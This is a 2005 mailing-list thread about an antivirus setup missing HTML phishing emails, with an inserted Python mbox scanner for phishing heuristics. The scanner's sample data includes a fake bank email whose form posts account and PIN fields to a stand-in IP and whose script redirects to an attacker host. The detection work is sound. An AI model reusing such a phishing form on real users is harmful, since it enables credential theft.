I got some emails that I forwarded to somebody else, and his mail server antivirus said they contained html viruses:

HTML.Phishing.GB-gen
HTML.Phishing.DB-1

Now, my amavis-new with antivir from H+BEDV Datentechnik GmbH (included in the SuSE DVD), updated a moment ago (VDF version: 6.32.3.5 created 23 Sep 2005) did not detect them.

Well, actually, running "antivir" on my local mbox it does say there is a virus there (there should be two):

/home/cer/mbox
  Date: 24.09.2005  Time: 21:24:09  Size: 1471684
  ALERT: [PHISH/PostBkfraud.I virus] /home/cer/mbox <<< Contains code of the PHISH/PostBkfraud.I virus

Also, it should detect the virus in the files where I saved them, but it doesn't.

Now, I'm not worried about those viruses damaging my system (I use Pine as MUA), but about the amavis+antivir setup not warning me about them when I try to forward them as emails (I have a friend that is interested in those emails).

Now, my question:

To whom do I email a sample of those viruses so that they update the "antivir" database? An email address, please. I looked at their webpage, but was unable to find it.

--
Cheers,
Carlos Robinson
On Saturday 24 September 2005 21:40, Carlos E. R. wrote:
> I got some emails that I forwarded to somebody else, and his mail server antivirus said they contained html viruses:
>
> HTML.Phishing.GB-gen
> HTML.Phishing.DB-1

A 5-second google didn't turn up anything interesting, but "phishing" doesn't normally mean virus; usually that refers to things like "Hi, I work for Deutsche Bank, please give me your password to our online banking service".
The Saturday 2005-09-24 at 21:48 +0200, Anders Johansson wrote:
> > HTML.Phishing.GB-gen
> > HTML.Phishing.DB-1
>
> A 5-second google didn't turn up anything interesting, but "phishing" doesn't normally mean virus; usually that refers to things like "Hi, I work for Deutsche Bank, please give me your password to our online banking service".

I know; it is surprising that people fall into the trap. But some of these emails contain javascript code; they rate as viruses as well.

I didn't think it is the job of an antivirus program to say "Hey, you got a virus in your machine! You sent a virus to me!" if it is not a virus, don't you think?

--
Cheers,
Carlos Robinson
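The thread above is about an HTML "phishing" detection that one scanner fired on and another missed. As an added illustration (not code from the thread, and not the H+BEDV antivir or amavisd-new logic, whose signatures are not public here), the script below runs a few heuristics of the kind such HTML.Phishing signatures key on over a local mbox: inline script, a form posting to a raw IP address or to a host outside the sender's domain, and links to IP literals. The mbox content, addresses and hosts are constructed for the example; the heuristic names and thresholds are my own assumptions.

```python
"""Heuristic HTML-phishing scan of an mbox (added example, not the
antivir/amavisd-new implementation). The sample mbox below is constructed."""
import mailbox
import re
import tempfile
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: one fake "bank" mail with a remote form plus script,
# and one ordinary newsletter linking to its own domain.
SAMPLE_MBOX = """From bounce@example.org Sat Sep 24 21:24:09 2005
From: "Postbank Security" <security@postbank.example>
To: cer@example.org
Subject: Account verification required
Message-ID: <phish-1@mailer.example.net>
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html><body>
<script>document.location.replace('http://login.evil.example/p.php')</script>
<form action="http://203.0.113.10/cgi-bin/collect.php" method="post">
Account: <input name="acct"> PIN: <input name="pin">
<input type="submit" value="Verify">
</form></body></html>

From bounce@example.org Sat Sep 24 21:30:00 2005
From: newsletter@shop.example
To: cer@example.org
Subject: September specials
Message-ID: <news-1@shop.example>
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii

<html><body><p>See <a href="http://www.shop.example/specials">our specials</a>.</p></body></html>

"""

_IP_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


class _PhishFeatures(HTMLParser):
    """Collect the HTML features the heuristics look at."""

    def __init__(self):
        super().__init__()
        self.has_script = False
        self.form_targets = []   # action= URLs of every <form>
        self.link_hosts = []     # hostnames of every <a href>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self.has_script = True
        elif tag == "form" and attrs.get("action"):
            self.form_targets.append(attrs["action"])
        elif tag == "a" and attrs.get("href"):
            host = urlparse(attrs["href"]).hostname
            if host:
                self.link_hosts.append(host)


def sender_domain(msg):
    """Domain of the From: address (may be forged, but it is what the victim sees)."""
    _, addr = parseaddr(msg.get("From", ""))
    return addr.rpartition("@")[2].lower()


def html_parts(msg):
    """Yield every text/html body in the message, decoded to str."""
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            payload = part.get_payload(decode=True) or b""
            yield payload.decode(part.get_content_charset() or "utf-8", "replace")


def analyse(msg):
    """Return the list of heuristic hits for one message (empty list = clean)."""
    hits = []
    domain = sender_domain(msg)
    for html in html_parts(msg):
        feats = _PhishFeatures()
        feats.feed(html)
        if feats.has_script:
            hits.append("script")
        for action in feats.form_targets:
            host = (urlparse(action).hostname or "").lower()
            if _IP_RE.match(host):
                hits.append("form-to-ip:" + host)
            elif host and host != domain and not host.endswith("." + domain):
                hits.append("form-offdomain:" + host)
        for host in feats.link_hosts:
            if _IP_RE.match(host):
                hits.append("link-to-ip:" + host)
    return hits


def scan_mbox(path):
    """Map Message-ID -> hits for every message in the mbox at path."""
    return {msg.get("Message-ID"): analyse(msg) for msg in mailbox.mbox(path)}


def scan_text(mbox_text):
    """Convenience wrapper: write the text to a temp file and scan it."""
    with tempfile.NamedTemporaryFile("w", suffix=".mbox", delete=False) as fh:
        fh.write(mbox_text)
        path = fh.name
    return scan_mbox(path)


if __name__ == "__main__":
    for mid, hits in scan_text(SAMPLE_MBOX).items():
        print(mid, "PHISH" if hits else "clean", hits)
```

Run it against a real mbox with `scan_mbox("/home/cer/mbox")`; the "form posts to a raw IP" and "form posts off-domain" rules are what separate a fraud page from a legitimate mailing that links back to its own site, which is why a newsletter with a link produces no hits while the fake bank mail produces several.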
On Sunday 25 September 2005 02:12, Carlos E. R. wrote:
> I didn't think it is the job of an antivirus program to say "Hey, you got a virus in your machine! You sent a virus to me!" if it is not a virus, don't you think?

I don't think it's the job of the AV program to say anything at all to the sender. Why bother bouncing the virus? In most cases the sender address will be forged anyway. It just causes needless (not to say useless) network traffic.

Thunderbird has started flagging suspected phishing attempts. I guess it's considered added value in these types of programs. But bouncing phishing attempts is probably worse than useless, as it tells these people that there is a valid mailbox there.
The Sunday 2005-09-25 at 02:26 +0200, Anders Johansson wrote:
> I don't think it's the job of the AV program to say anything at all to the sender. Why bother bouncing the virus? In most cases the sender address will be forged anyway. It just causes needless (not to say useless) network traffic.

In this case, it helped, because I noticed, and resent it encapsulated in an encrypted zip archive. Amavis-new doesn't bounce if the virus is one known for forging the from address; it is clever.

> Thunderbird has started flagging suspected phishing attempts. I guess it's considered added value in these types of programs.

Yes...

> But bouncing phishing attempts is probably worse than useless, as it tells these people that there is a valid mailbox there.

Well, in this case the bounce originates from the mail host machine, which is in a different domain altogether than the destination, which must be a virtual address then. It needs a human reading the email to check that. And in any case, the destination address is publicly known, so no damage can be done.

--
Cheers,
Carlos Robinson
Carlos E. R. said:
> Now, my question:
>
> To whom do I email a sample of those viruses so that they update the "antivir" database? An email address, please. I looked at their webpage, but was unable to find it.

Here's a good reference list: http://marc.theaimsgroup.com/?l=full-disclosure&m=109520967903662&w=2
participants (3)
- Anders Johansson
- Carlos E. R.
- Michel Messerschmidt